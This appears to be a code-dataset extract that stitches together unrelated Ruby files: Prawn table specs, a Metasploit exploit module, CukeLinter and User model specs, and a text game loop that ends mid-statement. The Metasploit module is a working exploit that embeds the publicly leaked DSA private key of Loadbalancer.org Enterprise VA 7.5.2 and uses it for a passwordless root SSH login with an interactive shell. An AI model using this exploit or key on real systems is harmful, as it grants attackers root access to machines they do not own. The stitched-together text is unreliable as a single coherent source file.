@table.column(0).width.should == @table.column(2).width
end
it "should allow table cells to be resized in block" do
lambda do
@pdf.table([%w[1 2 3 4 5]]) do |t|
t.width = 40
t.cells.size = 8
t.cells.padding = 0
end
end.should.not.raise(Prawn::Errors::CannotFit)
end
it "should be the width of the :width parameter" do
expected_width = 300
table = Prawn::Table.new( [%w[snake foo b apple],
%w[kitten d foobar banana]], @pdf,
:width => expected_width)
table.width.should == expected_width
end
it "should not exceed the :width option" do
expected_width = 400
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf, :width => expected_width)
table.width.should == expected_width
end
it "should not exceed the :width option even with manual widths specified" do
expected_width = 400
data = [
['This is a column with a lot of text that should comfortably exceed '+
'the width of a normal document margin_box width', 'Some more text',
'and then some more', 'Just a bit more to be extra sure']
]
table = Prawn::Table.new(data, @pdf, :width => expected_width) do
column(1).width = 100
end
table.width.should == expected_width
end
it "should calculate unspecified column widths even " +
"with colspan cells declared" do
pdf = Prawn::Document.new
hpad, fs = 3, 5
columns = 3
data = [ [ { :content => 'foo', :colspan => 2 }, "foobar" ],
[ "foo", "foo", "foo" ] ]
table = Prawn::Table.new( data, pdf,
:cell_style => {
:padding_left => hpad, :padding_right => hpad,
:size => fs
})
col0_width = pdf.width_of("foo", :size => fs) # cell 1, 0
col1_width = pdf.width_of("foo", :size => fs) # cell 1, 1
col2_width = pdf.width_of("foobar", :size => fs) # cell 0, 1 (at col 2)
table.width.should == col0_width + col1_width +
col2_width + 2*columns*hpad
end
end
describe "height" do
it "should set all cells in a row to the same height" do
@table = @pdf.table([["foo", @long_text]])
@table.cells[0, 0].height.should == @table.cells[0, 1].height
end
it "should move y-position to the bottom of the table after drawing" do
old_y = @pdf.y
table = @pdf.table([["foo"]])
@pdf.y.should == old_y - table.height
end
it "should not wrap unnecessarily" do
# Test for FP errors and glitches
t = @pdf.table([["Bender Bending Rodriguez"]])
h = @pdf.height_of("one line")
(t.height - 10).should.be < h*1.5
end
it "should have a height of n rows" do
data = [["foo"],["bar"],["baaaz"]]
vpad = 4
origin = @pdf.y
@pdf.table data, :cell_style => { :padding => vpad }
table_height = origin - @pdf.y
font_height = @pdf.font.height
line_gap = @pdf.font.line_gap
num_rows = data.length
table_height.should.be.close(
num_rows * font_height + 2*vpad*num_rows, 0.001 )
end
end
describe "position" do
it "should center tables with :position => :center" do
@pdf.expects(:bounding_box).with do |(x, y), opts|
expected = (@pdf.bounds.width - 500) / 2.0
(x - expected).abs < 0.001
end
@pdf.table([["foo"]], :column_widths => 500, :position => :center)
end
it "should right-align tables with :position => :right" do
@pdf.expects(:bounding_box).with do |(x, y), opts|
expected = @pdf.bounds.width - 500
(x - expected).abs < 0.001
end
@pdf.table([["foo"]], :column_widths => 500, :position => :right)
end
it "should accept a Numeric" do
@pdf.expects(:bounding_box).with do |(x, y), opts|
expected = 123
(x - expected).abs < 0.001
end
@pdf.table([["foo"]], :column_widths => 500, :position => 123)
end
it "should raise an ArgumentError on unknown :position" do
lambda do
@pdf.table([["foo"]], :position => :bratwurst)
end.should.raise(ArgumentError)
end
end
end
describe "Multi-page tables" do
it "should flow to the next page when hitting the bottom of the bounds" do
Prawn::Document.new { table([["foo"]] * 30) }.page_count.should == 1
Prawn::Document.new { table([["foo"]] * 31) }.page_count.should == 2
Prawn::Document.new { table([["foo"]] * 31); table([["foo"]] * 35) }.
page_count.should == 3
end
it "should respect the containing bounds" do
Prawn::Document.new do
bounding_box([0, cursor], :width => bounds.width, :height => 72) do
table([["foo"]] * 4)
end
end.page_count.should == 2
end
it "should not start a new page before finishing out a row" do
Prawn::Document.new do
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end.page_count.should == 1
end
it "should only start new page on long cells if it would gain us height" do
Prawn::Document.new do
text "Hello"
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end.page_count.should == 2
end
it "should not start a new page to gain height when at the top of " +
"a bounding box, even if stretchy" do
Prawn::Document.new do
bounding_box([bounds.left, bounds.top - 20], :width => 400) do
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end
end.page_count.should == 1
end
it "should still break to the next page if in a stretchy bounding box " +
"but not at the top" do
Prawn::Document.new do
bounding_box([bounds.left, bounds.top - 20], :width => 400) do
text "Hello"
table([[ (1..80).map{ |i| "Line #{i}" }.join("\n"), "Column 2" ]])
end
end.page_count.should == 2
end
it "should only draw first-page header if the first body row fits" do
pdf = Prawn::Document.new
pdf.y = 60 # not enough room for a table row
pdf.table [["Header"], ["Body"]], :header => true
output = PDF::Inspector::Page.analyze(pdf.render)
# Ensure we only drew the header once, on the second page
output.pages[0][:strings].should.be.empty
output.pages[1][:strings].should == ["Header", "Body"]
end
it "should draw background before borders, but only within pages" do
seq = sequence("drawing_order")
@pdf = Prawn::Document.new
# give enough room for only the first row
@pdf.y = @pdf.bounds.absolute_bottom + 30
t = @pdf.make_table([["A", "B"],
["C", "D"]],
:cell_style => {:background_color => 'ff0000'})
ca = t.cells[0, 0]
cb = t.cells[0, 1]
cc = t.cells[1, 0]
cd = t.cells[1, 1]
# All backgrounds should draw before any borders on page 1...
ca.expects(:draw_background).in_sequence(seq)
cb.expects(:draw_background).in_sequence(seq)
ca.expects(:draw_borders).in_sequence(seq)
cb.expects(:draw_borders).in_sequence(seq)
# ...and page 2
@pdf.expects(:start_new_page).in_sequence(seq)
cc.expects(:draw_background).in_sequence(seq)
cd.expects(:draw_background).in_sequence(seq)
cc.expects(:draw_borders).in_sequence(seq)
cd.expects(:draw_borders).in_sequence(seq)
t.draw
end
end
describe "#style" do
it "should send #style to its first argument, passing the style hash and" +
" block" do
stylable = stub()
stylable.expects(:style).with(:foo => :bar).once.yields
block = stub()
block.expects(:kick).once
Prawn::Document.new do
table([["x"]]) { style(stylable, :foo => :bar) { block.kick } }
end
end
it "should default to {} for the hash argument" do
stylable = stub()
stylable.expects(:style).with({}).once
Prawn::Document.new do
table([["x"]]) { style(stylable) }
end
end
end
describe "row_colors" do
it "should allow array syntax for :row_colors" do
data = [["foo"], ["bar"], ["baz"]]
pdf = Prawn::Document.new
t = pdf.table(data, :row_colors => ['cccccc', 'ffffff'])
t.cells.map{|x| x.background_color}.should == %w[cccccc ffffff cccccc]
end
it "should ignore headers" do
data = [["header"], ["foo"], ["bar"], ["baz"]]
pdf = Prawn::Document.new
t = pdf.table(data, :header => true,
:row_colors => ['cccccc', 'ffffff']) do
row(0).background_color = '333333'
end
t.cells.map{|x| x.background_color}.should ==
%w[333333 cccccc ffffff cccccc]
end
it "stripes rows consistently from page to page, skipping header rows" do
data = [["header"]] + [["foo"]] * 70
pdf = Prawn::Document.new
t = pdf.make_table(data, :header => true,
:row_colors => ['cccccc', 'ffffff']) do
cells.padding = 0
cells.size = 9
row(0).size = 11
end
# page 1: header + 67 cells (odd number -- verifies that the next
# page disrupts the even/odd coloring, since both the last data cell
# on this page and the first one on the next are colored cccccc)
Prawn::Table::Cell.expects(:draw_cells).with do |cells|
cells.map { |c, (x, y)| c.background_color } ==
[nil] + (%w[cccccc ffffff] * 33) + %w[cccccc]
end
# page 2: header
Prawn::Table::Cell.expects(:draw_cells).with do |cells|
cells.map { |c, (x, y)| c.background_color } == [nil]
end
# page 2: 3 data cells
Prawn::Table::Cell.expects(:draw_cells).with do |cells|
cells.map { |c, (x, y)| c.background_color } ==
%w[cccccc ffffff cccccc]
end
t.draw
end
it "should not override an explicit background_color" do
data = [["foo"], ["bar"], ["baz"]]
pdf = Prawn::Document.new
table = pdf.table(data, :row_colors => ['cccccc', 'ffffff']) { |t|
t.cells[0, 0].background_color = 'dddddd'
}
table.cells.map{|x| x.background_color}.should == %w[dddddd ffffff cccccc]
end
end
describe "inking" do
before(:each) do
@pdf = Prawn::Document.new
end
it "should set the x-position of each cell based on widths" do
@table = @pdf.table([["foo", "bar", "baz"]])
x = 0
(0..2).each do |col|
cell = @table.cells[0, col]
cell.x.should == x
x += cell.width
end
end
it "should set the y-position of each cell based on heights" do
y = 0
@table = @pdf.make_table([["foo"], ["bar"], ["baz"]])
(0..2).each do |row|
cell = @table.cells[row, 0]
cell.y.should.be.close(y, 0.01)
y -= cell.height
end
end
it "should output content cell by cell, row by row" do
data = [["foo","bar"],["baz","bang"]]
@pdf = Prawn::Document.new
@pdf.table(data)
output = PDF::Inspector::Text.analyze(@pdf.render)
output.strings.should == data.flatten
end
it "should not cause an error if rendering the very first row causes a " +
"page break" do
Prawn::Document.new do
arr = Array(1..5).collect{|i| ["cell #{i}"] }
move_down( y - (bounds.absolute_bottom + 3) )
lambda {
table(arr)
}.should.not.raise
end
end
it "should draw all backgrounds before any borders" do
# lest backgrounds overlap borders:
# https://github.com/sandal/prawn/pull/226
seq = sequence("drawing_order")
t = @pdf.make_table([["A", "B"]],
:cell_style => {:background_color => 'ff0000'})
ca = t.cells[0, 0]
cb = t.cells[0, 1]
# XXX Not a perfectly general test, because it would still be acceptable
# if we drew B then A
ca.expects(:draw_background).in_sequence(seq)
cb.expects(:draw_background).in_sequence(seq)
ca.expects(:draw_borders).in_sequence(seq)
cb.expects(:draw_borders).in_sequence(seq)
t.draw
end
it "should allow multiple inkings of the same table" do
pdf = Prawn::Document.new
t = Prawn::Table.new([["foo"]], pdf)
pdf.expects(:bounding_box).with{|(x, y), options| y.to_i == 495}.yields
pdf.expects(:bounding_box).with{|(x, y), options| y.to_i == 395}.yields
pdf.expects(:draw_text!).with{ |text, options| text == 'foo' }.twice
pdf.move_cursor_to(500)
t.draw
pdf.move_cursor_to(400)
t.draw
end
describe "in stretchy bounding boxes" do
it "should draw all cells on a row at the same y-position" do
pdf = Prawn::Document.new
text_y = pdf.y.to_i - 5 # text starts 5pt below current y pos (padding)
pdf.bounding_box([0, pdf.cursor], :width => pdf.bounds.width) do
pdf.expects(:draw_text!).checking { |text, options|
pdf.bounds.absolute_top.should == text_y
}.times(3)
pdf.table([%w[a b c]])
end
end
end
end
describe "headers" do
  # A header row is rendered just like any other row of cell text.
  it "should add headers to output when specified" do
    data = [["a", "b"], ["foo","bar"],["baz","bang"]]
    @pdf = Prawn::Document.new
    @pdf.table(data, :header => true)
    output = PDF::Inspector::Text.analyze(@pdf.render)
    output.strings.should == data.flatten
  end

  # With :header => true, the first row must be re-drawn at the top of
  # every page the table spills onto.
  it "should repeat headers across pages" do
    data = [["foo","bar"]] * 30
    headers = ["baz","foobar"]
    @pdf = Prawn::Document.new
    @pdf.table([headers] + data, :header => true)
    output = PDF::Inspector::Text.analyze(@pdf.render)
    # Expected order: header, all data rows except the last, the
    # repeated header on page 2, then the final data row.
    output.strings.should == headers + data.flatten[0..-3] + headers +
      data.flatten[-2..-1]
  end

  # Setting y to 0 forces an immediate page break before the table;
  # the header must still appear only once in the rendered output.
  it "should not draw header twice when starting new page" do
    @pdf = Prawn::Document.new
    @pdf.y = 0
    @pdf.table([["Header"], ["Body"]], :header => true)
    output = PDF::Inspector::Text.analyze(@pdf.render)
    output.strings.should == ["Header", "Body"]
  end
end
describe "nested tables" do
before(:each) do
@pdf = Prawn::Document.new
@subtable = Prawn::Table.new([["foo"]], @pdf)
@table = @pdf.table([[@subtable, "bar"]])
end
it "can be created from an Array" do
cell = Prawn::Table::Cell.make(@pdf, [["foo"]])
cell.should.be.an.instance_of(Prawn::Table::Cell::Subtable)
cell.subtable.should.be.an.instance_of(Prawn::Table)
end
it "defaults its padding to zero" do
@table.cells[0, 0].padding.should == [0, 0, 0, 0]
end
it "has a subtable accessor" do
@table.cells[0, 0].subtable.should == @subtable
end
it "determines its dimensions from the subtable" do
@table.cells[0, 0].width.should == @subtable.width
@table.cells[0, 0].height.should == @subtable.height
end
end
describe "An invalid table" do
before(:each) do
@pdf = Prawn::Document.new
@bad_data = ["Single Nested Array"]
end
it "should raise error when invalid table data is given" do
assert_raises(Prawn::Errors::InvalidTableData) do
@pdf.table(@bad_data)
end
end
it "should raise an EmptyTableError with empty table data" do
lambda {
data = []
@pdf = Prawn::Document.new
@pdf.table(data)
}.should.raise( Prawn::Errors::EmptyTable )
end
it "should raise an EmptyTableError with nil table data" do
lambda {
data = nil
@pdf = Prawn::Document.new
@pdf.table(data)
}.should.raise( Prawn::Errors::EmptyTable )
end
end
end
describe "colspan / rowspan" do
before(:each) { create_pdf }
it "doesn't raise an error" do
lambda {
@pdf.table([[{:content => "foo", :colspan => 2, :rowspan => 2}]])
}.should.not.raise
end
it "colspan is properly counted" do
t = @pdf.make_table([[{:content => "foo", :colspan => 2}]])
t.column_length.should == 2
end
it "rowspan is properly counted" do
t = @pdf.make_table([[{:content => "foo", :rowspan => 2}]])
t.row_length.should == 2
end
it "raises if colspan or rowspan are called after layout" do
lambda {
@pdf.table([["foo"]]) { cells[0, 0].colspan = 2 }
}.should.raise(Prawn::Errors::InvalidTableSpan)
lambda {
@pdf.table([["foo"]]) { cells[0, 0].rowspan = 2 }
}.should.raise(Prawn::Errors::InvalidTableSpan)
end
it "raises when spans overlap" do
lambda {
@pdf.table([["foo", {:content => "bar", :rowspan => 2}],
[{:content => "baz", :colspan => 2}]])
}.should.raise(Prawn::Errors::InvalidTableSpan)
end
it "table and cell width account for colspan" do
t = @pdf.table([["a", {:content => "b", :colspan => 2}]],
:column_widths => [100, 100, 100])
spanned = t.cells[0, 1]
spanned.colspan.should == 2
t.width.should == 300
t.cells.min_width.should == 300
t.cells.max_width.should == 300
spanned.width.should == 200
end
it "table and cell height account for rowspan" do
t = @pdf.table([["a"], [{:content => "b", :rowspan => 2}]]) do
row(0..2).height = 100
end
spanned = t.cells[1, 0]
spanned.rowspan.should == 2
t.height.should == 300
spanned.height.should == 200
end
it "provides the full content_width as drawing space" do
w = @pdf.make_table([["foo"]]).cells[0, 0].content_width
t = @pdf.make_table([[{:content => "foo", :colspan => 2}]])
t.cells[0, 0].spanned_content_width.should == w
end
it "dummy cells are not drawn" do
# make a fake master cell for the dummy cell to slave to
t = @pdf.make_table([[{:content => "foo", :colspan => 2}]])
# drawing just a dummy cell should not ink
@pdf.expects(:stroke_line).never
@pdf.expects(:draw_text!).never
Prawn::Table::Cell.draw_cells([t.cells[0, 1]])
end
it "dummy cells do not add any height or width" do
t1 = @pdf.table([["foo"]])
t2 = @pdf.table([[{:content => "foo", :colspan => 2}]])
t2.width.should == t1.width
t3 = @pdf.table([[{:content => "foo", :rowspan => 2}]])
t3.height.should == t1.height
end
it "dummy cells ignored by #style" do
t = @pdf.table([[{:content => "blah", :colspan => 2}]],
:cell_style => { :size => 9 })
t.cells[0, 0].size.should == 9
end
it "splits natural width between cols in the group" do
t = @pdf.table([[{:content => "foo", :colspan => 2}]])
widths = t.column_widths
widths[0].should == widths[1]
end
it "splits natural width between cols when width is increased" do
t = @pdf.table([[{:content => "foo", :colspan => 2}]],
:width => @pdf.bounds.width)
widths = t.column_widths
widths[0].should == widths[1]
end
it "splits min-width between cols in the group" do
# Since column_widths, when reducing column widths, reduces proportional to
# the remaining width after each column's min width, we must ensure that the
# min-width is split proportionally in order to ensure the width is still
# split evenly when the width is reduced. (See "splits natural width between
# cols when width is reduced".)
t = @pdf.table([[{:content => "foo", :colspan => 2}]],
:width => 20)
t.column(0).min_width.should == t.column(1).min_width
end
it "splits natural width between cols when width is reduced" do
t = @pdf.table([[{:content => "foo", :colspan => 2}]],
:width => 20)
widths = t.column_widths
widths[0].should == widths[1]
end
it "splits natural_content_height between rows in the group" do
t = @pdf.table([[{:content => "foo", :rowspan => 2}]])
heights = t.row_heights
heights[0].should == heights[1]
end
it "skips column numbers that have been col-spanned" do
t = @pdf.table([["a", "b", {:content => "c", :colspan => 3}, "d"]])
t.cells[0, 0].content.should == "a"
t.cells[0, 1].content.should == "b"
t.cells[0, 2].content.should == "c"
t.cells[0, 3].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[0, 4].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[0, 5].content.should == "d"
end
it "skips row/col positions that have been row-spanned" do
t = @pdf.table([["a", {:content => "b", :colspan => 2, :rowspan => 2}, "c"],
["d", "e"],
["f", "g", "h", "i"]])
t.cells[0, 0].content.should == "a"
t.cells[0, 1].content.should == "b"
t.cells[0, 2].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[0, 3].content.should == "c"
t.cells[1, 0].content.should == "d"
t.cells[1, 1].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[1, 2].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[1, 3].content.should == "e"
t.cells[2, 0].content.should == "f"
t.cells[2, 1].content.should == "g"
t.cells[2, 2].content.should == "h"
t.cells[2, 3].content.should == "i"
end
end
| 33.060987 | 92 | 0.572997 |
396f88a742dbdf804fec363ba8e4646ed621243f | 4,260 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::SSH
def initialize(info = {})
super(update_info(info, {
'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure',
'Description' => %q{
Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances
version 7.5.2 that allows passwordless authentication to any other LB Enterprise box.
Since the key is easily retrievable, an attacker can use it to gain unauthorized remote
access as root.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['PACKETSTORM', '125754']
],
'DisclosureDate' => "Mar 17 2014",
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
# Target host, read from the manually registered RHOST option.
# (This module does not mix in Msf::Exploit::Remote::Tcp, which would
# normally provide these accessors.)
def rhost
  datastore['RHOST']
end

# Target SSH port; defaults to 22 via register_options above.
def rport
  datastore['RPORT']
end
# Attempt a public-key SSH login as +user+ with the baked-in appliance
# key (#key_data).
#
# Returns a Net::SSH::CommandStream wrapping the live session on
# success, or nil on any connection, negotiation, timeout or
# authentication failure (failures are reported via print_error where
# a message is useful).
def do_login(user)
  factory = ssh_socket_factory
  opt_hash = {
    :auth_methods => ['publickey'],
    :port => rport,
    :key_data => [ key_data ],
    :use_agent => false,        # never consult the local ssh-agent
    :config => false,           # ignore the operator's ~/.ssh config
    :proxy => factory,
    :non_interactive => true,   # fail rather than prompt
    :verify_host_key => :never
  }
  # Extreme verbosity, gated behind the advanced SSH_DEBUG option.
  opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
  begin
    ssh_socket = nil
    # Bound the whole negotiation so a wedged service cannot hang the run.
    ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
      ssh_socket = Net::SSH.start(rhost, user, opt_hash)
    end
  rescue Rex::ConnectionError
    return nil
  rescue Net::SSH::Disconnect, ::EOFError
    print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
    return nil
  rescue ::Timeout::Error
    print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
    return nil
  rescue Net::SSH::AuthenticationFailed
    print_error "#{rhost}:#{rport} SSH - Failed authentication"
    return nil
  rescue Net::SSH::Exception => e
    print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
    return nil
  end
  if ssh_socket
    # Create a new session from the socket, then dump it.
    conn = Net::SSH::CommandStream.new(ssh_socket)
    ssh_socket = nil
    return conn
  else
    return nil
  end
end
# Attempt the passwordless root login and, on success, hand the SSH
# command stream's socket to the payload handler.
def exploit
  conn = do_login("root")
  return unless conn

  print_good "#{rhost}:#{rport} - Successful login"
  handler(conn.lsock)
end
# The DSA private key shipped on Loadbalancer.org Enterprise VA 7.5.2
# appliances (see the PACKETSTORM 125754 reference above). Because the
# key is publicly known, it grants passwordless root access.
# NOTE: the heredoc body must remain byte-for-byte identical.
def key_data
  <<EOF
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
SzmJVCWFyVuuANR2Bnc=
-----END DSA PRIVATE KEY-----
EOF
end
end
| 29.583333 | 102 | 0.639671 |
f79cc701e1796bd3702d440c6785f24802faa2e4 | 8,829 | require_relative '../../../../../environments/rspec_env'
RSpec.describe CukeLinter::FeatureWithTooManyDifferentTagsLinter do
let(:model_file_path) { 'some_file_path' }
it_should_behave_like 'a linter at the unit level'
it_should_behave_like 'a configurable linter at the unit level'
it 'has a name' do
expect(subject.name).to eq('FeatureWithTooManyDifferentTagsLinter')
end
describe 'linting' do
context 'with a feature that contains too many different tags' do
let(:test_model) do
model = generate_feature_model(parent_file_path: model_file_path)
model.tags = [CukeModeler::Tag.new('@1'),
CukeModeler::Tag.new('@2'),
CukeModeler::Tag.new('@3'),
CukeModeler::Tag.new('@4'),
CukeModeler::Tag.new('@5'),
CukeModeler::Tag.new('@6'),
CukeModeler::Tag.new('@7'),
CukeModeler::Tag.new('@8'),
CukeModeler::Tag.new('@9'),
CukeModeler::Tag.new('@10'),
CukeModeler::Tag.new('@11')]
model
end
it_should_behave_like 'a linter linting a bad model'
it 'records a problem' do
result = subject.lint(test_model)
expect(result[:problem]).to match(/^Feature contains too many different tags. \d+ tags found \(max 10\)\.$/)
end
it 'includes the number of different tags found in the problem record' do
unique_tag_count = test_model.tags.count
result = subject.lint(test_model)
expect(result[:problem])
.to eq("Feature contains too many different tags. #{unique_tag_count} tags found (max 10).")
test_model.tags << CukeModeler::Tag.new('@had_better_be_unique')
result = subject.lint(test_model)
expect(result[:problem])
.to eq("Feature contains too many different tags. #{unique_tag_count + 1} tags found (max 10).")
end
it 'only counts unique tags' do
model = generate_feature_model
model.tags = []
100.times { model.tags << CukeModeler::Tag.new('@A') }
result = subject.lint(model)
expect(result).to eq(nil)
end
context 'with child models' do
let(:test_model) do
model = generate_feature_model
model.tags = [CukeModeler::Tag.new('@1'),
CukeModeler::Tag.new('@2'),
CukeModeler::Tag.new('@3'),
CukeModeler::Tag.new('@4'),
CukeModeler::Tag.new('@5'),
CukeModeler::Tag.new('@6'),
CukeModeler::Tag.new('@7'),
CukeModeler::Tag.new('@8'),
CukeModeler::Tag.new('@9'),
CukeModeler::Tag.new('@10'),
CukeModeler::Tag.new('@11')]
# Not all model types are a test but the models dont care and it's good enough for the test
model.tests = [child_model]
model
end
# Descriptive variable name, just in case what kinds of elements are taggable ever changes
taggable_elements = %w[feature scenario outline example]
taggable_elements.each do |model_type|
context 'that have tags' do
let(:child_model) do
model = send("generate_#{model_type}_model")
model.tags = [CukeModeler::Tag.new('@12'),
CukeModeler::Tag.new('@13'),
CukeModeler::Tag.new('@14')]
model
end
it "considers tags from a #{model_type}" do
result = subject.lint(test_model)
expect(result[:problem]).to eq('Feature contains too many different tags. 14 tags found (max 10).')
end
end
context 'that do not have tags' do
context 'because their tags are empty' do
let(:child_model) do
model = send("generate_#{model_type}_model")
model.tags = []
model
end
it 'can handle the child model without problem' do
expect { subject.lint(test_model) }.to_not raise_error
end
end
end
end
end
end
context 'with a feature that does not contain too many different tags' do
context 'because it contains 10 different tags' do
let(:test_model) do
model = generate_feature_model
model.tags = [CukeModeler::Tag.new('@1'),
CukeModeler::Tag.new('@2'),
CukeModeler::Tag.new('@3'),
CukeModeler::Tag.new('@4'),
CukeModeler::Tag.new('@5'),
CukeModeler::Tag.new('@6'),
CukeModeler::Tag.new('@7'),
CukeModeler::Tag.new('@8'),
CukeModeler::Tag.new('@9'),
CukeModeler::Tag.new('@10')]
model
end
it_should_behave_like 'a linter linting a good model'
end
context 'because it contains fewer than 10 different tags' do
let(:test_model) do
model = generate_feature_model
model.tags = [CukeModeler::Tag.new('@1')]
model
end
it_should_behave_like 'a linter linting a good model'
end
context 'because it contains no tags' do
context 'because its tags are empty' do
let(:test_model) do
model = generate_feature_model
model.tags = []
model
end
it_should_behave_like 'a linter linting a good model'
end
context 'because its tags are nil' do
# NOTE: Not handling the case of the model's tags being nil because the model methods used in the
# linter's implementation will themselves not work when the tags are nil.
end
end
end
describe 'configuration' do
let(:default_tag_threshold) { 10 }
describe 'tag threshold configuration' do
context 'with no configuration' do
context 'because configuration never happened' do
let(:unconfigured_test_model) do
model = generate_feature_model
model.tags = []
(default_tag_threshold + 1).times { |count| model.tags << CukeModeler::Tag.new("@#{count}") }
model
end
it 'defaults to a tag threshold of 10 tags' do
result = subject.lint(unconfigured_test_model)
expected_count = unconfigured_test_model.tags.count
expect(result[:problem])
.to eq("Feature contains too many different tags. #{expected_count} tags found (max 10).")
end
end
context 'because configuration did not set a tag threshold' do
let(:configuration) { {} }
let(:test_model) do
model = generate_feature_model
model.tags = []
(default_tag_threshold + 1).times { |count| model.tags << CukeModeler::Tag.new("@#{count}") }
model
end
before(:each) do
subject.configure(configuration)
end
it 'defaults to a tag threshold of 10 tags' do
result = subject.lint(test_model)
expect(result[:problem])
.to eq("Feature contains too many different tags. #{test_model.tags.count} tags found (max 10).")
end
end
end
context 'with configuration' do
let(:tag_threshold) { 3 }
let(:configuration) { { 'TagCountThreshold' => tag_threshold } }
before(:each) do
subject.configure(configuration)
end
let(:test_model) do
model = generate_feature_model
model.tags = []
(tag_threshold + 1).times { |count| model.tags << CukeModeler::Tag.new("@#{count}") }
model
end
it 'the tag threshold used is the configured value' do
result = subject.lint(test_model)
expected_count = test_model.tags.count
expect(result[:problem])
.to eq("Feature contains too many different tags. #{expected_count} tags found (max #{tag_threshold}).")
end
end
end
end
context 'a non-feature model' do
let(:test_model) { CukeModeler::Model.new }
it_should_behave_like 'a linter linting a good model'
end
end
end
| 29.332226 | 118 | 0.539132 |
26518c953f3c4537c8286674d19d9dc045fd98d8 | 241 | # frozen_string_literal: true
# Unit spec for the User model: association wiring plus the two
# presence validations, via matcher one-liners (is_expected uses the
# named subject below).
RSpec.describe User do
  # Built, not persisted — presumably via FactoryBot; confirm against
  # the suite's factory setup.
  subject(:user) { build(:user) }

  it { is_expected.to have_many :projects }
  it { is_expected.to validate_presence_of :email }
  it { is_expected.to validate_presence_of :name }
end
| 21.909091 | 51 | 0.738589 |
ed6552fbc4a296451be8ea799bc60e4633778daf | 2,142 | require 'io/console'
require './Game'
player = Player.new
game = Game.new player
player.currentSector = game.sectors[0]
# set name
# Name-entry loop: keep asking until the player confirms with 'y'.
# Confirming also flips game.running, which lets the main loop start.
while player.nameSet == false && game.running == false
  printf "What is your name?\n"
  player.name = gets.chomp
  printf "\nYour name is %s, is this right? [y/n]\n", player.name
  # Single unbuffered keypress (io/console); anything but 'y' re-prompts.
  if STDIN.getch == 'y' then
    player.nameSet = true
    game.running = true
    printf "\nWelcome %s!\n", player.name
  end
  printf "\n"
end
# Main game loop: read one command line per iteration and dispatch on
# the first word. Unknown commands are silently ignored (as before).
while game.running
  line = gets
  # Fix: the original `gets.chomp` raised NoMethodError on nil at EOF
  # (e.g. Ctrl-D or exhausted piped input). Exit the loop gracefully.
  break if line.nil?

  input = line.chomp.split
  next if input.empty?

  case input[0]
  when "exit", "quit"
    game.exit
  when "i", "inv", "inventory"
    player.showInventory
  when "m", "map"
    game.showMap
  when "doors"
    game.showDoorsFor player.currentSector
  when "goto"
    player.goto input[1], game.sectors
  when "build"
    if input[1] == "item"
      # More than one word after "item" means the name had whitespace.
      if input[2] && input[3]
        printf "\nName can't contain white spaces!\n\n"
      elsif input[2] && input[2].delete(' ') != ""
        item = Item.new input[2]
        printf "\nYou created an item called %s\n\n", item.name
        player.addItemToInventory item
        printf "\n%s added to your inventory\n\n", item.name
      else
        printf "\nbuild item <name>\n\n"
      end
    elsif input[1] == "sector"
      printf "\nYou created a sector\n\n"
    else
      printf "\nbuild <item|sector> <name>\n\n"
    end
  when "take"
    player.take input[1]
  when "wai", "whereami"
    printf "\nYou are in sector %s\n\n", player.currentSector.name
  when "drop"
    player.drop input[1]
  when "give"
    player.give input[1]
  when "destroy"
    player.destroy input[1]
  when "o", "objs", "objects"
    game.showObjectsIn player.currentSector
  when "save"
    player.save
  when "help"
